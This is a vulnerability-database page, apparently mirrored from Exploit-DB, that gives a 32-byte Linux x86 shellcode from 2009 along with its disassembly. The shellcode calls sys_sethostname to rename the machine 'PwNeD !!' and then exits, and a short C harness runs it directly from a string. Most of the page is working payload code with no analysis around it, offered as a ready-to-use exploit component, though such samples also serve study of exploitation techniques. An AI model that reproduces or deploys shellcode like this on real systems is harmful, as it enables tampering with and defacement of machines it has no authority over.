Linux/x86 - sethostname(PwNeD !!, 8) Shellcode (32 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057860 漏洞类型
发布时间 2009-05-31 更新时间 2009-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43687
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
Title  : sethostname "pwned !!"
Name   : 32 bytes sys_sethostname("PwNeD !!",8) x86 linux shellcode
Date   : may, 31 2009
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : devilzc0de.com
blog   : gunslingerc0de.wordpress.com
tested on : linux debian
*/

#include <stdio.h>

char *shellcode=
 "\xeb\x11"                    /* jmp    0x8048073 */
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x4a"                    /* mov    $0x4a,%al */
 "\x5b"                        /* pop    %ebx */
 "\xb1\x08"                    /* mov    $0x8,%cl */
 "\xcd\x80"                    /* int    $0x80 */
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x01"                    /* mov    $0x1,%al */
 "\x31\xdb"                    /* xor    %ebx,%ebx */
 "\xcd\x80"                    /* int    $0x80 */
 "\xe8\xea\xff\xff\xff"        /* call   0x8048062 */
 "\x50"                        /* push   %eax */
 "\x77\x4e"                    /* ja     0x80480c9 */
 "\x65"                        /* gs */
 "\x44"                        /* inc    %esp */
 "\x20\x21"                    /* and    %ah,(%ecx) */
 "\x21";                        /* .byte 0x21 */

int main(void)
{
		fprintf(stdout,"Length: %d\n",strlen(shellcode));
		((void (*)(void)) shellcode)();
		return 0;
}